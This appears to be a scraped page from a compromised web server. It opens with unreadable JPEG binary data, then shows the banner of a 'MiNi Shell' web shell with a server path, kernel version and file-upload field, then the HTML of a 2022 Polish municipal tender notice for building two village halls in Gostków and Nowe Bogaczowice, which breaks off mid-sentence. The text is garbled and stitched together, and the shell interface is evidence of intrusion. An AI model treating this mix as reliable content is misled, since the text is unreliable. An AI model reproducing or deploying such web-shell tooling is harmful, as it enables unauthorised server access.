JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220705/0023840201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa dwóch świetlic wiejskich w miejscowościach Gostków i Nowe Bogaczowice, gmina Stare Bogaczowice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stare Bogaczowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718283</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Główna 132</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stare Bogaczowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-312</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">74 8452 220</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rig@starebogaczowice.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starebogaczowice.ug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa dwóch świetlic wiejskich w miejscowościach Gostków i Nowe Bogaczowice, gmina Stare Bogaczowice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cd795a09-fc2e-11ec-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00238402</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00000541/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa dwóch świetlic wiejskich w miejscowościach Gostków i Nowe Bogaczowice, gmina Stare Bogaczowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ ; http://bip.starebogaczowice.ug.gov.pl/zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu,który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod<br/>adresem:https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: rig@starebogaczowice.ug.gov.pl<br/>Wykonawca składa ofertę za pośrednictwem Formularza dostępnego na ePUAP i udostępnionego<br/>również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla<br/>Wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca<br/>zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja<br/>związana z postępowaniem. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty<br/>opisany został w Instrukcji użytkownika, dostępnej na stronie:https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę,<br/>oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,<br/>.doc, .docx, .odt.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP, dzięki któremu uzyska dostęp do formularzy: złożenia, zmiany, wycofania<br/>oferty lub wniosku oraz do formularza niezbędnego do komunikacji.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. Za datę przekazania oferty,<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP<br/>Zasady składanie ofert:<br/>1) Wykonawca składa ofertę za pośrednictwem formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty wykonawca zobowiązany jest podać<br/>adres skrzynki ePUAP, na którym prowadzona będzie<br/>korespondencja związana z postępowaniem. Zamawiający zastrzega, że chwilą złożenia oferty jest<br/>czas na serwerze obsługującym miniPortal, który zapisuje wysyłane na niego dane z dokładnością co<br/>do setnej części sekundy. Zamawiający zastrzega, iż złożenie oferty w innej formie elektronicznej<br/>będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 6) ustawy. Sposób złożenia<br/>oferty, w tym zaszyfrowania (deszyfrowania) oferty opisany został w Instrukcji użytkownika systemu<br/>dostępnej pod adresem:<br/>https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Urząd Gminy Stare Bogaczowice z siedzibą w przy ul. Głównej 132, 58-312<br/>Stare Bogaczowice;<br/>• inspektorem ochrony danych osobowych w Urzędzie Gminy Stare Bogaczowice jest Pani Gabriela Roszczyk, tel. 74-8452220, email<br/>urząd@starebogaczowice.ug.gov.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Budowa dwóch świetlic wiejskich w miejscowościach Gostków i Nowe Bogaczowice, gmina<br/>Stare Bogaczowice”;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>• Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym, wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>• W przypadku danych osobowych zamieszczanych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 rozporządzenia 2016/697, są wykonywane w drodze żądania skierowanego do Zmawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIG.271.20.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zamówienia pn.: „Budowa dwóch świetlic wiejskich w miejscowościach Gostków i<br/>Nowe Bogaczowice, gmina Stare Bogaczowice”<br/>Zakres robót budowlanych :<br/><br/>1) Budowa świetlicy wiejskiej w miejscowości Gostków:<br/>Obiekt będący w rzucie prostokątem będzie budynkiem wolnostojącym, parterowym, niepodpiwniczonym, przekrytym<br/>dachem dwuspadowym. Jego charakterystyczne parametry techniczne to:<br/>· Długość– 24,50m<br/>· Szerokość– 10,50m<br/>· Wysokość w kalenicy – 6,63m<br/>· Powierzchnia użytkowa – 220,72m2<br/>· Powierzchnia zabudowy – 255,15m2<br/>· Kubatura – 1371,02m3<br/>· Liczba kondygnacji – 1 nadziemna<br/>Podstawowy zakres inwestycji obejmuje wykonanie nw. robót:<br/>1. Ogólnobudowlane<br/>2. Instalacyjne - wewnętrzna instalacja wodociągowa wody zimnej, ciepłej<br/>3. Instalacyjne wentylacji<br/>4. Kanalizacja sanitarna<br/>5. Centralne ogrzewanie z pompą ciepła<br/>6. Kanalizacja deszczowej<br/>7. Wewnętrzne instalacji elektryczne,<br/>8. Instalacje odgromowe<br/>9. Mała architektura, zieleń, dojścia, dojazdy miejsca parkingowe,<br/>10. Przyłącza wody, sanitarne, deszczówki i energii elektrycznej,<br/>11. 12. Budowa zjazdów zabudowę cieków wodnych, budowę kładki pieszej nad ciekiem oraz zbiornika p-poż.<br/>Pełen zakres robót budowlanych zawarty jest w: Projektach technicznych, przedmiarach robót i Specyfikacjach<br/>Technicznych Wykonania i Odbioru Prac Budowlanych. Wszystkie obowiązki Wykonawcy zawarte są w umowie dołączonej<br/>do SIWZ.<br/><br/>2) Budowa świetlicy wiejskiej w miejscowości Nowe Bogaczowice:<br/>Obiekt będący w rzucie prostokątem będzie budynkiem wolnostojącym, parterowym, niepodpiwniczonym, przekrytym<br/>dachem dwuspadowym. Jego charakterystyczne parametry techniczne to:<br/>· Długość– 24,50m<br/>· Szerokość– 10,50m<br/>· Wysokość w kalenicy – 6,63m<br/>· Powierzchnia użytkowa – 220,72m2<br/>· Powierzchnia zabudowy – 255,15m2<br/>· Kubatura – 1371,02m3<br/>· Liczba kondygnacji – 1 nadziemna<br/>Podstawowy zakres inwestycji obejmuje wykonanie nw. robót:<br/>1. Ogólnobudowlane<br/>2. Instalacyjne - wewnętrzna instalacja wodociągowa wody zimnej, ciepłej<br/>3. Instalacyjne wentylacji<br/>4. Kanalizacja sanitarna<br/>5. Centralne ogrzewanie z pompą ciepła<br/>6. Kanalizacja deszczowej<br/>7. Wewnętrzne instalacji elektryczne,<br/>8. Instalacje odgromowe<br/>9. Mała architektura, zieleń, dojścia, dojazdy miejsca parkingowe,<br/>10. Przyłącza wody, sanitarne, deszczówki i energii elektrycznej,<br/>11. Budowa zjazdów<br/>Pełen zakres robót budowlanych zawarty jest w: Projektach technicznych, przedmiarach robót i Specyfikacjach<br/>Technicznych Wykonania i Odbioru Prac Budowlanych. Wszystkie obowiązki Wykonawcy zawarte są<br/>w umowie dołączonej do SIWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyskała największą liczbę punktów (P).<br/>4. Liczba punktów za kryterium:<br/>4.1. „Cena” – zostanie obliczona z dokładnością do dwóch miejsc po przecinku, w następujący sposób:<br/>C= /Cmin : Cbad/ x 60<br/>gdzie:<br/>C – liczba punktów za kryterium „Cena” przyznana ocenianej ofercie<br/>Cmin– najniższa cena spośród ocenianych ofert<br/>Cbad – cena oferty ocenianej<br/>4.2. „Okres gwarancji i rękojmi ” - zostanie obliczona w następujący sposób:<br/>G= /Gn : Gmax/ x 40<br/>gdzie :<br/>G– liczba punktów, która zostanie przyznana dla oferty badanej w tym kryterium<br/>Gn- okres gwarancji i rękojmi oferty ocenianej (min. 36 miesięcy) ,<br/>Gmax - najdłuższy zaoferowany okres gwarancji za wady spośród ocenianych ofert,<br/>Uwaga:<br/>Zaoferowany przez wykonawców okres gwarancji i rękojmi nie może być krótszy niż 36 miesięcy. W przypadku krótszego okresu<br/>gwarancji zaoferowanego przez wykonawców oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy.<br/>Maksymalny punktowany okres gwarancji i rękojmi ma wynosi nie więcej niż 60 miesięcy.<br/>W przypadku zaoferowania przez Wykonawcę okresu dłuższego niż 60 m-cy oferta Wykonawcy otrzyma ilość punktów przypadającą<br/>za okres 60 miesięcy, ale Wykonawca ten będzie związany okresem gwarancji zaoferowanym w „Formularzu oferty”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasa-dach określonych w §<br/>VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej: Warunek ten zostanie spełniony jeśli Wykonawca bę-dzie posiadał ubezpieczenie<br/>od odpowiedzialności cywilnej w zakresie prowadzonej dzia-łalności związanej z przedmiotem zamówienia z minimalną<br/>sumą gwarancyjną w wysokości co najmniej 2.000.000,00 zł (dwa miliony złotych) na jedno i wszystkie zdarzenia.<br/>W przypadku wykonawców występujących wspólnie, o których mowa w art. 58 ust. 1 ustawy Pzp w celu wykazania<br/>spełniania warunku, wykonawca musi wykazać, że co najmniej jeden z podmiotów wspólnie ubiegających się o udzielenie<br/>zamówienia spełnia ten warunek.<br/>Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z załącznikiem nr 2A do SWZ, które<br/>stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu. Następnie na podstawie<br/>przedłożonych dokumentów tj. aktualnej, opłaconej poli-sy OC lub w przypadku jej braku inny dokument potwierdzający, że<br/>wykonawca jest ubezpie-czony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej z<br/>minimalną<br/>sumą gwarancyjną na jedno i wszystkie zdarzenia w wysokości co najmniej 2.000.000,00 zł<br/>Wykonawca może w celu potwierdzenia spełnienia warunku udziału w postępowaniu polegać na sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby niezależnie od cha-rakteru prawnego łączących go z nimi stosunków<br/>prawnych.<br/>4) zdolności technicznej lub zawodowej. Wykonawca spełni warunek, jeżeli wykaże, że:<br/>4.1) doświadczenie zawodowe:<br/>a) ddla uznania, że wykonawca spełnia warunek posiadania doświadczenia zamawiający żąda by wykonawca wykazał, iż w<br/>okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu<br/>składania ofert wykonał co najmniej dwie roboty budowlane polegające na budowie lub przebu-dowie lub remoncie budynku<br/>mieszkalnego lub użyteczności publicznej o wartości nie mniejszej niż 2.000.000,00 zł brutto każda.<br/>b) w przypadku wykonawców występujących wspólnie, o których mowa w art. 58 ust. 1 ustawy Pzp w celu wykazania<br/>spełniania warunku dotyczącego doświadczenia za-wodowego, wykonawca musi wykazać, że co najmniej jeden z<br/>podmiotów wspólnie ubiegających się o udzielenie zamówienia zrealizował wymagane roboty budowlane, zgodnie z<br/>zasadami określonymi w lit. a);<br/>c) jeżeli Wykonawca polega na zdolnościach technicznych lub zawodowych innego podmiotu, na zasadach określonych w<br/>art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunku dotyczącego doświadczenia zawodowego, wykonawca<br/>musi wy-kazać, że podmiot ten zrealizował wymagane roboty budowlane, zgodnie z zasadami określonymi w lit. a);<br/>d) ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z załącznikiem nr 2A do SWZ, które stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu. Następnie na podstawie<br/>wypełnionego for-mularza stanowiącego załącznik Nr 3 do SWZ złożonego na wezwanie Zamawiające-go przez<br/>Wykonawcę, którego oferta została najwyżej oceniona, tj. wykazu wykona-nych robót. Do przedmiotowego wykazu należy<br/>dołączyć dowody potwierdzające, że wykazane roboty zostały wykonane w 